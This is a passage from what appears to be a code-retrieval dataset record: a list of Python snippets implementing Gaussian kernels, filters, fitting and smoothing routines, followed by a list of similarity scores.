np.arange(-filter_size // 2 + 1., filter_size // 2 + 1.)\n xx, yy = np.meshgrid(ax, ax)\n kernel = np.exp(-0.5 * (np.square(xx) + np.square(yy)) / np.square(sig))\n return kernel / np.sum(kernel)", "def nGaussianCen(p, x, mu):\n # 2013-05-06 20:29 IJMC: Created\n\n x = array(x, dtype=float, copy=False)\n ret = np.zeros(x.size)\n ngaussians = int(len(p)/2)\n for ii in xrange(ngaussians):\n ret += gaussian([p[ii*2], p[ii*2+1], mu[ii], 0], x)\n if len(p)/2.<>len(p)/2: # P is odd, so the last value is our\n ret += p[-1] # additive constant.\n\n return ret", "def generateCoefficients (self):\n\t\tself.ws = []\n\t\tif not self.sine:\n\t\t\tself.bs = []\n\t\tmean = np.zeros(self.dim)\n\t\tcov = np.eye(self.dim)*(2*self.gammak)\n\n\t\tif self.sine:\n\t\t\tfor _ in range(self.rn):\n\t\t\t\tself.ws.append(nr.multivariate_normal(mean, cov))\n\t\telse:\n\t\t\tfor _ in range(self.rn):\n\t\t\t\tself.ws.append(nr.multivariate_normal(mean, cov))\n\t\t\t\tself.bs.append(nr.uniform(0.0, 2*np.pi))", "def gauss_convolve(array, sigma):\r\n\t##remove singleton dimesions and make sure values are floats\r\n\tarray = array.squeeze().astype(float)\r\n\t##allocate memory for result\r\n\tresult = np.zeros(array.shape)\r\n\t##if the array is 2-D, handle each trial 
separately\r\n\ttry:\r\n\t\tfor trial in range(array.shape[1]):\r\n\t\t\tresult[:,trial] = gaussian_filter(array[:, trial], sigma = sigma, order = 0, mode = \"constant\", cval = 0.0)\r\n\t##if it's 1-D:\r\n\texcept IndexError:\r\n\t\tif array.shape[0] == array.size:\r\n\t\t\tresult = gaussian_filter(array, sigma = sigma, order = 0, mode = \"constant\", cval = 0.0)\r\n\t\telse:\r\n\t\t\tprint \"Check your array dimenszions!\"\r\n\treturn result", "def gaussianKM (X, P, gamma):\n X = np.matrix(X)\n P = np.matrix(P)\n m, n = X.shape\n p, n = P.shape\n\n XPt = X * P.T\n D1 = np.diag(X * X.T).reshape(m, 1)\n D1 = np.matrix(np.repeat(D1, p, axis=1))\n D2 = np.diag(P * P.T).reshape(p, 1)\n D2 = np.matrix(np.repeat(D2, m, axis=1))\n D2 = D2.T\n\n KM = D1 + D2 - 2 * XPt\n return np.exp (-gamma * KM)", "def doubleGaussianCen(p, x, mu1, mu2):\n # 2013-05-06 20:29 IJMC: Created\n\n x = array(x, dtype=float, copy=False)\n param1 = [p[0], p[1], mu1, 0]\n if len(p)==4:\n param2 = [p[2], p[3], mu2, 0]\n elif len(p)==5:\n param2 = [p[2], p[3], mu2, p[4]]\n\n return gaussian(param1, x) + gaussian(param2, x)", "def gaussian_filter(self, sigma):\n\n mask = self.get_weighted_mask()\n mask_f = ni.gaussian_filter(mask, sigma=sigma)\n\n return SpatialReceptiveField(mask_f, self.altPos, self.aziPos, sign=self.sign,\n temporalWindow=self.temporalWindow, pixelSizeUnit=self.pixelSizeUnit,\n dataType=self.dataType, thr=self.thr, filter_sigma=sigma,\n interpolate_rate=self.interpolate_rate)", "def coefficients(dataset):\r\n x = [row[0] for row in dataset]\r\n y = [row[1] for row in dataset]\r\n x_mean, y_mean = mean(x), mean(y)\r\n b1 = covariance(x, x_mean, y, y_mean) / variance(x, x_mean)\r\n b0 = y_mean - b1 * x_mean\r\n return [b0, b1]", "def GaussianKernel(radius, std):\n size = 2 * radius + 1\n weight = torch.ones(size, size)\n weight.requires_grad = False\n for i in range(-radius, radius+1):\n for j in range(-radius, radius+1):\n dis = (i * i) + (j * j)\n weight[i+radius][j+radius] = np.exp(-dis / (2 * std * std))\n weight = weight / weight.sum()\n return weight", "def fake_gaussian(img, vertical_horizontal_sigma, iter=3):\n sigma_vertical, sigma_horizontal = vertical_horizontal_sigma\n h_blured = box_filter1d(img, sigma_horizontal, horizontal=True, iter=iter)\n blured = box_filter1d(h_blured, sigma_vertical, horizontal=False, iter=iter)\n return blured", "def Gaussian(x,t,sigma):\n return np.exp(-(x-t)**2/(2*sigma**2))", "def compute_kernel_matrix(x,y,sigma):\n m = len(x)\n\n s = np.zeros((m,m))\n for i in range(len(x)):\n for j in range(i+1):\n s[i,j] = np.exp(-((x[i]-y[j])**2)/(2*sigma**2))\n for i in range(2,m):\n for j in range(0,i):\n s[i,j] = s[j,i]\n return s", "def create_gaussian_array(self):\n\n # Fill array of size l x w with Gaussian Noise.\n terrain_length = int(ceil(self.length/self.resolution))\n terrain_width = int(ceil(self.width/self.resolution))\n gaussian_array = np.random.normal(self.mu, self.sigma, (terrain_length,terrain_width))\n\n # Filter the array to smoothen the variation of the noise\n gaussian_array = gaussian_filter(gaussian_array, self.sigma_filter)\n\n return gaussian_array", "def get_filter(omega_x: float, omega_y: float, omega_z: float,\n omega: np.ndarray) -> np.ndarray:\n\n # A 3D Gaussian is the product of three 1D Gaussians.\n variance = 2.5\n c = 1 / (2 * variance) # 0.2\n filter_x = np.exp(-c*np.power(omega-omega_x, 2))\n filter_y = np.exp(-c*np.power(omega-omega_y, 2))\n filter_z = np.exp(-c*np.power(omega-omega_z, 2))\n filter_3d = 
np.multiply.outer(np.multiply.outer(filter_x, filter_y), \n filter_z)\n\n return filter_3d", "def GaussianKernel(sigma: float = 1., width: int = 0):\n assert not ((width is None or width == 0) and\n (sigma is None or sigma == 0)), \\\n \"GaussianKernel :: both sigma ({}) & width ({}) are not valid\".format(\n sigma, width)\n\n if width is None or width == 0:\n width = int(2.0 * 3.0 * sigma + 1.0)\n if width % 2 == 0:\n width += 1\n\n if sigma is None or sigma == 0:\n sigma = (width - 1)/6.\n half = width//2\n x, y = np.meshgrid(np.linspace(-half, half, width),\n np.linspace(-half, half, width), indexing='xy')\n w = np.exp(- (x**2 + y**2) / (2.*(sigma**2)))\n w /= np.sum(w)\n return torch.from_numpy(w.astype(np.float32)).view(1, 1, width, width)", "def cov_matrix(X, mu):\n m, n = X.shape\n X_minus_mu = X - mu\n sigma = (1 / m) * (X_minus_mu.T).dot(X_minus_mu)\n\n return sigma", "def cheby_coeff2(m,s):\r\n c = np.zeros(m+1)\r\n for j in range(m+1):\r\n c[j] = 2*np.exp(-s)*j1(-s)\r\n \r\n return c", "def fmgf(array, sigma):\n x, y = np.arange(len(array)), array.copy()\n yg = ndimage.filters.gaussian_filter(y, sigma)\n y -= yg\n\n # digitizing\n m = 101\n dy = 6.0 * mad(y) / m\n ybin = np.arange(np.min(y) - 5 * dy, np.max(y) + 5 * dy + dy, dy)\n z = np.zeros([len(ybin), len(x)])\n z[np.digitize(y, ybin), x] = 1.0\n\n # filtering\n g = partial(ndimage.filters.gaussian_filter, sigma=(0, sigma))\n c = partial(ndimage.filters.convolve1d, weights=np.ones(m), axis=0)\n zf = c(c(c(g(z))))\n\n # estimates\n ym1, y0, yp1 = [ybin[np.argmax(zf, 0) + i] for i in (-1, 0, 1)]\n zm1, z0, zp1 = [zf[np.argmax(zf, 0) + i, x] for i in (-1, 0, 1)]\n t = (zm1 - z0) / (zm1 - 2 * z0 + zp1)\n\n filtered = yg + ((1 - t) ** 2) * ym1 + (2 * t * (1 - t)) * y0 + (t**2) * yp1\n return filtered", "def gaussian3d(l, sigma=1.0):\n\n ax = np.arange(-l//2 + 1.0, l//2 + 1.0)\n xx, yy, zz = np.meshgrid(ax, ax, ax)\n\n kernel = np.exp(-(xx**2 + yy**2 + zz**2)/(2.0*sigma**2))\n\n return np.asarray(kernel, dtype=np.float32)", "def gaussian(x, x0=0.0, fwhm=1.0, ampl=1.0):\n return ampl * np.exp(-4 * np.log(2) * ((x - x0) / fwhm) ** 2)", "def gaussian_black(z, mu: 'normal' = 0, sigma: (0.4,1) = 0.7):\n return 1/(np.sqrt(2*np.pi)*sigma)*np.exp(-np.power((z - mu)/sigma, 2)/2)", "def func_gaussian(self, dmv, vpar):\n dmoff = dmv - vpar[0]\n sig = vpar[1]\n sig = sig * sig\n return np.exp(-0.5 * dmoff * dmoff / sig) * self.ThetaFunc(dmv)", "def MVgaussian(size,mu1=0,mu2=0, sigma1=3,sigma2 = 1):\n kernel = np.zeros((size, size), dtype=np.float32)\n \n size = int(size) // 2\n X = np.arange(-size,size+1)\n Y = np.arange(-size,size+1)\n \n for x in X:\n for y in Y:\n Gx = np.exp(-((x-mu1)**2)/(2*(sigma1**2)))\n Gy = np.exp(-((y-mu2)**2)/(2*(sigma2**2)))\n Gx = math.exp(-(math.pow(x-mu1,2))/(2*math.pow(sigma1,2)))\n Gy = math.exp(-(math.pow(y-mu2,2))/(2*math.pow(sigma2,2)))\n kernel[x+size,y+size] = Gx*Gy\n return kernel", "def gaussian(x, sigma):\n try: r = np.exp(-0.5*(x/sigma)**2) \n except: r = np.zeros(len(x))\n return r", "def get_square_gauss(x_mat):\n sq_mat = np.zeros(x_mat['mu'].shape)\n\n for i in range(x_mat['mu'].shape[1]):\n sq_mat[:, i] = x_mat['mu'][:, i] ** 2.0\n sq_mat[:, i] += np.diag(x_mat['sigma'][i, :, :])\n\n return sq_mat", "def gaussianFilter3D(size, points):\n \n matrix = numpy.zeros((size, size, size))\n \n for point in points:\n x0 = point[0]\n y0 = point[1]\n z0 = point[2]\n x2SigmaSquared = pow(point[3] * size/4, 2) * 2\n y2SigmaSquared = pow(point[4] * size/4, 2) * 2\n z2SigmaSquared = pow(point[5] * size/4, 2) * 
2\n tempMatrix = numpy.zeros((size, size, size))\n for x in range(0, size):\n for y in range(0, size):\n for z in range(0, size):\n tempMatrix[y, x, z] = math.exp(-1 * \\\n (math.pow(x-x0, 2)/x2SigmaSquared +\\\n math.pow(y-y0, 2)/y2SigmaSquared +\\\n math.pow(z-z0, 2)/z2SigmaSquared))\n \n matrix = numpy.add(matrix, tempMatrix)\n \n matrix = matrixfix.flatten(matrix, 0, 1)\n \n return matrix", "def fit_gaussian(array):\n\n shape = array.shape\n xmean, ymean = numpy.array(shape) / 2.\n\n xx, yy = numpy.mgrid[:shape[0], :shape[1]]\n\n g_init = astropy.modeling.models.Gaussian2D(amplitude=1., x_mean=xmean, y_mean=ymean,\n x_stddev=1., y_stddev=1.)\n\n f2 = astropy.modeling.fitting.LevMarLSQFitter()\n\n gg = f2(g_init, xx, yy, array)\n\n return gg", "def forward(self, xs, like_params, nan_mask=None):\n\t\tassert len(like_params) == 1, f\"SphericalGaussianLikelihood only takes\"\\\n\t\t\t\t+ f\" a single parameter. Found {len(like_params)}.\"\n\t\t# Unwrap the single parameter tuple.\n\t\tlike_params = like_params[0] # [b,s,m,m_dim]\n\t\tassert len(like_params.shape) == 4\n\t\txs = xs.unsqueeze(1) # [b,1,m,m_dim]\n\t\t# Make a Gaussian distribution.\n\t\tdist = Normal(\n\t\t\t\ttorch.zeros(1, device=xs.device),\n\t\t\t\tself.std_dev*torch.ones(1, device=xs.device),\n\t\t)\n\t\tlog_probs = xs - like_params # [b,s,m,m_dim]\n\t\tlog_probs = dist.log_prob(log_probs).sum(dim=3) # [b,s,m]\n\t\tif nan_mask is not None:\n\t\t\ttemp_mask = (~nan_mask).float().unsqueeze(1).expand(log_probs.shape)\n\t\t\tassert temp_mask.shape == log_probs.shape, \\\n\t\t\t\t\tf\"{temp_mask.shape} != {log_probs.shape}\"\n\t\t\tlog_probs = log_probs * temp_mask # [b,s,m]\n\t\treturn log_probs", "def multivariate_gaussian(pos, mu, Sigma):\r\n\r\n n = mu.shape[0]\r\n Sigma_det = np.linalg.det(Sigma)\r\n Sigma_inv = np.linalg.inv(Sigma)\r\n N = np.sqrt((2*np.pi)**n * Sigma_det)\r\n # This einsum call calculates (x-mu)T.Sigma-1.(x-mu) in a vectorized\r\n # way across all the input variables.\r\n fac = np.einsum('...k,kl,...l->...', pos-mu, Sigma_inv, pos-mu)\r\n\r\n return np.exp(-fac / 2) / N", "def fitgaussian(data):\n params = moments(data)\n errorfunction = lambda p: np.ravel(gaussian(*p)(*np.indices(data.shape)) -\n data)\n p, success = leastsq(errorfunction, params)\n return p", "def scipy_smooth(img, sigma=5):\n return ndimage.gaussian_filter(img, sigma=sigma)", "def g(x):\n return 5. 
- x[:, 1] - .5 * x[:, 0] ** 2.", "def fitgaussian(data):\n params = moments(data)\n errorfunction = lambda p: np.ravel(gaussian(*p)(*np.indices(data.shape)) -\n data)\n p, success = optimize.leastsq(errorfunction, params)\n return p", "def fitgaussian(data):\n params = moments(data)\n errorfunction = lambda p: np.ravel(gaussian(*p)(*np.indices(data.shape)) -\n data)\n p, success = optimize.leastsq(errorfunction, params)\n return p", "def filter_to_matrix(data):\n spectrogram_shape = data[0].shape\n fit_data = np.zeros(shape=(len(data), spectrogram_shape[0], spectrogram_shape[1]))\n for i in range(len(data)):\n # filtered_spectrogram = apply_thresholding(gaussian_filter(data[i]))\n filtered_spectrogram = gaussian_filter(data[i])\n for j in range(filtered_spectrogram.shape[0]):\n for k in range(filtered_spectrogram.shape[1]):\n fit_data[i][j][k] = filtered_spectrogram[j][k]\n return fit_data", "def gaussion_smoothing(self,sigma=None):\n print(\"## Gaussian smoothing...\");\n corr_length = self.corr_length\n if sigma is None:\n corr = self.correlation\n oscillation=np.max(np.abs(corr[:-1]-corr[1:]),axis=0)\n peak=np.max(np.abs(corr),axis=0)\n oscillation /= peak\n sigma= corr_length/(5.0*oscillation*len(corr)*self.smooth_tune) # 15.0 has been tuned for many times \n print \"sigma:\"\n print sigma\n for i in np.arange(corr_length):\n self.correlation[i] *= exp(-i*i/(2*sigma*sigma))/(sigma*sqrt(2*pi))", "def create_model() -> sklearn.mixture.GaussianMixture:\n logger.info(\"Creating Gaussian Mixture model\")\n logger.debug(\n f\"Model: GaussianMixture, n_components={data.N_CENTERS}, \"\n + f\"covariance_type={COVARIANCE_TYPE}, n_init={N_INIT}, \"\n + f\"init_params={INIT_PARAMS}\"\n )\n return GaussianMixture(\n n_components=data.N_CENTERS,\n covariance_type=COVARIANCE_TYPE,\n n_init=N_INIT,\n init_params=INIT_PARAMS,\n )", "def estimate_uni_gaussian(X):\n mu = mean(X, axis=0)\n sigma2 = var(X, axis=0)\n return mu, sigma2", "def Gaussian_conv(n):\n\n\t# Choose sigma and mu\n\tsigma = 1\n\tmu = 0\n\n\t# Create table\n\tb = sigma * np.random.randn(n) + mu\n\tsum = b.sum()\n\t#b = b/sum\n\tprint(b)\n\treturn b", "def gaussianFilter(gain,BT,spSym,nTaps):\n\n a = np.sqrt(np.log(2)/2)/BT\n t = np.linspace(-.5*nTaps,.5*nTaps-1,nTaps)/spSym\n\n ft = np.sqrt(np.pi)/a *np.exp(-(np.pi**2*(t)**2)/a**2)\n ft /= np.sum(ft) * gain # normalize filter\n\n return ft", "def gaussian_filter(shape=(3,3),sigma=0.5):\n m,n = [(ss-1.)/2. for ss in shape]\n y,x = np.ogrid[-m:m+1,-n:n+1]\n h = np.exp( -(x*x + y*y) / (2.*sigma*sigma))\n h[ h < np.finfo(h.dtype).eps*h.max() ] = 0\n sumh = h.sum()\n if sumh != 0:\n h /= sumh\n return h", "def __bivariate_gaussian(self, sig1, sig2, mu1, mu2, x1, x2, rho):\n Z1 = ((x1 - mu1) / sig1) ** 2\n Z2 = ((x2 - mu2) / sig2) ** 2\n Z3 = 2 * rho * (x1 - mu1) * (x2 - mu2) / (sig1 * sig2)\n Z = Z1 + Z2 - Z3\n\n pi_const = torch.tensor([np.pi]).to(self.__device)\n\n return torch.exp(-Z / (2 * (1 - rho ** 2))).to(self.__device) / (\n 2 * pi_const * sig1 * sig2 * torch.sqrt(1 - rho ** 2)\n )", "def __bivariate_gaussian(self, sig1, sig2, mu1, mu2, x1, x2, rho):\n Z1 = ((x1 - mu1) / sig1) ** 2\n Z2 = ((x2 - mu2) / sig2) ** 2\n Z3 = 2 * rho * (x1 - mu1) * (x2 - mu2) / (sig1 * sig2)\n\n Z = Z1 + Z2 - Z3\n\n pi_const = torch.tensor([np.pi]).to(self.__device)\n\n return torch.exp(-Z / (2 * (1 - rho ** 2))).to(self.__device) / (\n 2 * pi_const * sig1 * sig2 * torch.sqrt(1 - rho ** 2)\n )", "def gaussian(amp, fwhm, mean, x):\n return amp * np.exp(-4. 
* np.log(2) * (x-mean)**2 / fwhm**2)", "def gaussian_white(z, mu: 'normal' = 0, sigma: (0.4, 1) = 0.7):\n return 1 - gaussian_black(z, mu, sigma)", "def model_gauss(xsigma, nx, ny=1, nz=1, ysigma=None, zsigma=None, xcenter=None, ycenter=None, zcenter=None):\n\te = EMData()\n\te.set_size(nx, ny, nz)\n\tif( ysigma == None ) : ysigma = xsigma\n\tif( zsigma == None ) : zsigma = xsigma\n\tif( xcenter == None ) : xcenter = nx//2\n\tif( ycenter == None ) : ycenter = ny//2\n\tif( zcenter == None ) : zcenter = nz//2\n\te.process_inplace(\"testimage.puregaussian\", {\"x_sigma\":xsigma,\"y_sigma\":ysigma,\"z_sigma\":zsigma,\"x_center\":xcenter,\"y_center\":ycenter,\"z_center\":zcenter} )\n\treturn e", "def isotropic_Gaussian(ksize=15, l=6):\n\n V = np.array([[1, 0], [0, -1]])\n D = np.array([[l, 0], [0, l]])\n Sigma = np.dot(np.dot(V, D), np.linalg.inv(V))\n k = gm_blur_kernel(mean=[0, 0], cov=Sigma, size=ksize)\n\n return k", "def gaussian_kernel(size, sigma):\n\n kernel = np.zeros((size, size))\n\n ### YOUR CODE HERE\n k = (size-1)/2\n factor = 1/(2*np.pi*sigma**2)\n for i in range(size):\n for j in range(size):\n exponent = -((i-k)**2 +(j-k)**2)/(2*sigma**2)\n kernel[i,j] = factor*np.exp(exponent)\n ### END YOUR CODE\n\n return kernel", "def get_gaussian(nsig=1.5, kernlen=13):\n\n interval = (2*nsig+1.)/(kernlen)\n x = np.linspace(-nsig-interval/2., nsig+interval/2., kernlen+1)\n kern1d = np.diff(st.norm.cdf(x))\n kernel_raw = np.sqrt(np.outer(kern1d, kern1d))\n kernel = kernel_raw/kernel_raw.sum()\n return theano.shared(kernel.astype(\"float32\"), borrow=True)", "def get_transform_matrix(gamma, a, epsilon=1e-8):\n return (np.diag(1.0 / (a + epsilon)) @ gamma).T", "def coefficients(self):\r\n return self.coef_['x']", "def gaussian_blur(self, img):\n kernel_size = self.gaussian_blur_params[\"kernel_size\"]\n return cv2.GaussianBlur(img, (kernel_size, kernel_size), 0)", "def Gaussian(x, t, sigma):\n return np.exp(-(x - t)**2 / (2 * sigma**2))", "def fitgaussian(data):\n params = moments(data)\n errorfunction = lambda p: ravel(gaussian(*p)(*indices(data.shape)) -\n data)\n p, success = optimize.leastsq(errorfunction, params)\n return p", "def transform(self,G):\n\n n = len(self.G_train_)\n nt = len(G)\n #Ks = sp.zeros((n,1))\n kernel_matrix = sp.zeros((nt,n))\n \n# for j in range(n):\n# Ks[j] = sp.sqrt(aGMKernel(self.G_train_[j],self.G_train_[j],self.alpha,self.gamma))\n# \n# for i in range(nt):\n# Kts = sp.sqrt(aGMKernel(G[i],G[i],self.alpha,self.gamma))\n# for j in range(n):\n# kernel_matrix[i,j] = aGMKernel(G[i],self.G_train_[j],self.alpha,self.gamma)/Kts/Ks[j]\n \n for i in range (nt):\n for j in range(n):\n kernel_matrix[i,j] = aGMKernel(G[i],self.G_train_[j],self.alpha, self.gamma)\n \n \n return kernel_matrix", "def gaussian(x, mean, sigma):\n return np.exp(-np.square(x-mean)/(2*np.square(sigma))) / (np.sqrt(2*np.pi*sigma**2))", "def gauss_smooth(data, sigma):\n\t\t\t# make the kernel 5 sigmas wide in each direction\n\t\t\tkernel = stats.norm.pdf(np.arange(-5*sigma, (5*sigma)+1), scale=sigma)\n\t\t\t\n\t\t\treturn sp.ndimage.convolve1d(data, kernel, axis=2)", "def gaussian(x, *parameters):\n position, sigma, amplitude, background = parameters\n return amplitude * np.exp(-(x - position)**2 / (2.0 * sigma**2)) + background", "def get_features_critic(state):\n # reshape to make it a matrix with one row (so we can transpose it later)\n p, v = state\n p_v = np.array([p, v]).reshape((1, -1)).T\n X = np.array([p_v - c_entry.T for c_entry in C])\n inv_cov = np.linalg.inv(np.diag([0.04, 0.0004]))\n phi 
= np.array([np.exp(-(xi.T @ inv_cov @ xi) / 2) for xi in X])\n\n return np.squeeze(phi) # get rid of 2 unnecessary dimensions", "def FV_GMM(xx, gmm):\n \n # Attributes of the GMM.\n means = gmm.means_ # Shape: (K, d)\n covar = gmm.covariances_ # Shape: (K, d)\n weights = gmm.weights_ # Shape: (K, )\n n_comps = gmm.n_components # Integer scalar\n \n # Encoded document.\n xx = np.atleast_2d(xx) # Shape: (T, d) \n T = xx.shape[0] # Doc. length\n d = xx.shape[1] # Dimensionality of word/feat. vectors\n \n # Array to store the result.\n out = np.zeros((n_comps, d), dtype=np.float32) # Shape: (K, d)\n \n # Posterior probabilities.\n probs = gmm.predict_proba(xx) # Shape: (T, K)\n \n # Soft assignment of a document `xx` to k-th Gaussian. \n probs_sum = np.sum(probs, 0)[:, np.newaxis] # Shape: (K, 1)\n \n # Vectorization of the sum over t of `gamma_t(i)*x_t`.\n probs_xx = np.dot(probs.T, xx) # Shape: (K, d)\n \n # Derivatives with respect to the means.\n d_mean = probs_xx - means * probs_sum # Shape: (K, d)\n \n # Normalization.\n eps = 1e-6 # Avoids dividing by 0\n np.divide(d_mean, np.sqrt(covar), out=d_mean)\n \n out = d_mean / (np.sqrt(weights.reshape((n_comps, 1)) + eps))\n \n return out.flatten()", "def fspecial_gaussian(shape=(3, 3), sigma=0.5):\n m, n = [(ss - 1.) / 2. for ss in shape]\n y, x = np.ogrid[-m:m + 1, -n:n + 1]\n h = np.exp(-(x * x + y * y) / (2. * sigma * sigma))\n h[h < np.finfo(h.dtype).eps * h.max()] = 0\n sumh = h.sum()\n if sumh != 0:\n h /= sumh\n return h", "def gamma_matrix(gamma_coefs):\n matrix = np.ndarray([len(gamma_coefs), 3, 256], dtype=int)\n\n # gamma_coefs contains an [R, G, B] gamma table for each slab\n for i, slab in enumerate(gamma_coefs):\n for j, color in enumerate(slab):\n for k in range(256):\n v = pow(k / 255, color) * 255\n v = int(round(v))\n matrix[i, j, k] = v\n return matrix", "def __gaussian_blur(self, img, kernel_size=3):\n return cv2.GaussianBlur(img, (kernel_size, kernel_size), 0)", "def gaussianblur_transform(im):\n im_gblur = cv2.GaussianBlur(im,(5,5),0)\n return im_gblur" ]
[ "0.64841884", "0.6266498", "0.6249518", "0.59057564", "0.5897109", "0.5803587", "0.57633173", "0.5752097", "0.56212413", "0.56012994", "0.5532037", "0.5527262", "0.55129933", "0.55118227", "0.5507921", "0.54987395", "0.5487615", "0.54819536", "0.54755914", "0.5475295", "0.5471288", "0.5470004", "0.546501", "0.54598325", "0.54492927", "0.5445654", "0.5442235", "0.5435253", "0.54186183", "0.54112786", "0.54024386", "0.5385494", "0.5378067", "0.53775054", "0.53758305", "0.5361536", "0.5356859", "0.53510606", "0.5323843", "0.5305672", "0.5292315", "0.5283903", "0.5277511", "0.5257358", "0.5242478", "0.52404267", "0.52359545", "0.52271885", "0.52219534", "0.52112216", "0.5207602", "0.52034044", "0.5198882", "0.51910347", "0.51863766", "0.5175186", "0.5170019", "0.51673156", "0.5167194", "0.51626396", "0.5155137", "0.5151069", "0.51503223", "0.514882", "0.5140108", "0.5134104", "0.51338124", "0.51316553", "0.5128646", "0.51211923", "0.51211923", "0.51181245", "0.5117667", "0.51170075", "0.51147175", "0.511074", "0.5109472", "0.51056063", "0.5105427", "0.51011795", "0.510077", "0.50940436", "0.509369", "0.50872564", "0.5082928", "0.5078514", "0.5073507", "0.50702757", "0.50688833", "0.506701", "0.50658196", "0.505914", "0.50540686", "0.5039263", "0.503673", "0.5031028", "0.50261253", "0.50145334", "0.5013562", "0.5010401", "0.50089175" ]
0.0
-1
Returns a 2D Laplacian kernel array.
def get_laplacian_kernel(kernel_size) -> torch.Tensor:
    kernel: torch.Tensor = get_laplacian_kernel2d(kernel_size)
    return kernel
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_laplacian_kernel2d(kernel_size: int) -> torch.Tensor:\n if not isinstance(kernel_size, int) or kernel_size % 2 == 0 or \\\n kernel_size <= 0:\n raise TypeError(\"ksize must be an odd positive integer. Got {}\"\n .format(kernel_size))\n\n kernel = torch.ones((kernel_size, kernel_size))\n mid = kernel_size // 2\n kernel[mid, mid] = 1 - kernel_size ** 2\n kernel_2d: torch.Tensor = kernel\n return kernel_2d", "def get_laplacian_kernel(kernel_size: int) -> torch.Tensor:\n if not isinstance(kernel_size, int) or kernel_size % 2 == 0 or \\\n kernel_size <= 0:\n raise TypeError(\"ksize must be an odd positive integer. Got {}\"\n .format(kernel_size))\n window_1d: torch.Tensor = laplacian_1d(kernel_size)\n return window_1d", "def conv2D(inImage: np.ndarray, kernel2: np.ndarray) -> np.ndarray:\r\n flip_kernel = np.flipud(np.fliplr(kernel2))\r\n kernel_row = flip_kernel.shape[0]\r\n kernel_col = flip_kernel.shape[1]\r\n\r\n new_img = np.zeros_like(inImage)\r\n padded_img = padded_replicate(inImage, kernel_row, kernel_col)\r\n\r\n for x in range(inImage.shape[0]):\r\n for y in range(inImage.shape[1]):\r\n new_img[x, y] = (padded_img[x: x + kernel_col, y: y + kernel_row] * flip_kernel).sum()\r\n if flip_kernel.sum() != 0:\r\n new_img[x, y] /= flip_kernel.sum()\r\n\r\n return new_img", "def generate_2D(X):\n\n\tno_of_images = len(X)\n\tdata = np.zeros((no_of_images, 28, 28))\n\n\tfor i in xrange(no_of_images):\n\t\tdata[i] = np.copy(X[i].reshape(28, 28))\n\n\treturn data", "def getLongArray2D(self) -> typing.List[typing.List[int]]:\n ...", "def getArray2d(self):\n\t\treturn self.array2d", "def _convolve_2d(kernel, image):\n\n nx = image.shape[0]\n ny = image.shape[1]\n nkx = kernel.shape[0]\n nky = kernel.shape[1]\n wkx = nkx // 2\n wky = nky // 2\n\n result = np.zeros(image.shape, dtype=float32)\n\n for i in prange(0, nx, 1):\n iimin = max(i - wkx, 0)\n iimax = min(i + wkx + 1, nx)\n for j in prange(0, ny, 1):\n jjmin = max(j - wky, 0)\n jjmax = min(j + wky + 1, ny)\n num = 0.0\n for ii in range(iimin, iimax, 1):\n iii = wkx + ii - i\n for jj in range(jjmin, jjmax, 1):\n jjj = wky + jj - j\n num += kernel[iii, jjj] * image[ii, jj]\n result[i, j] = num\n\n return result", "def convolution_2d(img, kernel):\n # TODO write convolution of arbritrary sized convolution here\n # Hint: you need the kernelsize\n\n offset = int(kernel.shape[0] / 2)\n irows, icols = img.shape\n newimg = np.zeros((irows - offset, icols - offset, offset * 2 + 1, offset * 2 + 1))\n nrows, ncols, _, _ = newimg.shape\n for x in range(nrows - 1):\n for y in range(ncols - 1):\n newimg[x, y, :, :] = img[x:x + offset * 2 + 1, y:y + offset * 2 + 1]\n newimg *= kernel\n\n newimg = np.sum(newimg, axis=3)\n newimg = np.sum(newimg, axis=2)\n\n return newimg", "def convolve_spikes_2d(spikes_a,spikes_b,kernel_a,kernel_b):\n output = np.zeros((spikes_a.shape[0]+kernel_a.shape[0],kernel_a.shape[1]*kernel_b.shape[1]))\n for k_i in range(kernel_a.shape[1]):\n for k_j in range(kernel_b.shape[1]):\n mat = np.zeros((kernel_a.shape[0],kernel_b.shape[0]))\n #for l_1 in range(kernel_a.shape[0]):\n # for l_2 in range(kernel_b.shape[0]):\n # mat[l_1,l_2] = kernel_a[l_1,k_i] * kernel_b[l_2,k_j]\n for i in np.where(spikes_a)[0]:\n for j in np.where(spikes_b[(i+1):(i+1+kernel_b.shape[0])])[0]:\n if j < kernel_b.shape[0]:\n output[(i+j):(i+j+kernel_a.shape[0]),k_i * kernel_b.shape[1] + k_j] = output[(i+j):(i+j+kernel_a.shape[0]),k_i * kernel_b.shape[1] + k_j] + kernel_a[:,k_i] * kernel_b[j,k_j] #mat[:,j-i]\n return output[:spikes_a.shape[0],:]", "def 
laplacian(src: torch.Tensor, kernel_size: int) -> torch.Tensor:\n return Laplacian(kernel_size)(src)", "def _get_n2(self) -> np.ndarray:\n if self.nstep is None:\n n2_disp1d = np.arange(-self.N // 2 + 1, self.N // 2 + 1) ** 2\n else:\n p1d = np.arange(self.N) * 2 * np.pi / self.L\n\n coeffs = get_laplace_coefficients(self.nstep)\n norm = self.L ** 2 / self.epsilon ** 2 / 4 / np.pi ** 2\n\n n2_disp1d = np.sum(\n [\n -cn * np.cos(n * p1d * self.epsilon) * norm\n for n, cn in coeffs.items()\n ],\n axis=0,\n )\n\n return np.sum(\n [el.flatten() for el in np.meshgrid(*[n2_disp1d] * self._ndim)], axis=0\n )", "def two_dim(a: cython.double[:,:]):\n a[0,0] *= 3\n return a[0,0], a[0,1], a.ndim", "def L2_func(x):\n return K.expand_dims(K.sqrt(K.sum(K.pow(x,2), axis=1)))", "def convolution2D(ndarray, kernel, kernel_pivot):\n\t#validation of arrays types\n\tassert ndarray.dtype == np.float, 'Invalid dtype of ndarray should be float'\n\tassert kernel.dtype == np.float, 'Invalid dtype of kernel should be float'\n\tassert ndarray.ndim == 2, 'Invalid ndarray dimension'\n\tassert kernel.ndim == 2, 'Invalid kernel dimension'\n\t#check if the kernel_pivot is valid\n\theight_kernel, width_kernel = kernel.shape\n\tx_pivot, y_pivot = kernel_pivot\n\n\tif not (x_pivot >= 0 and x_pivot < width_kernel) and (y_pivot >= 0 and y_pivot < height_kernel):\n\n\t\tassert False, 'Invalid pivot coordinates'\n\n\tflatten_kernel = kernel.flatten()\n\n\t#create new ndarray object for store the result\n\tresult_ndarray = np.zeros(ndarray.shape, dtype = float)\n\n\t#get the actual shape for \n\theight, width = ndarray.shape\n\t\n\t#calculate kernel bounds\n\tx_min, x_max = (x_pivot), ((width_kernel-1) - x_pivot)\n\ty_min, y_max = (y_pivot), ((height_kernel-1) - y_pivot)\n\n\t#change the bounds of my array with 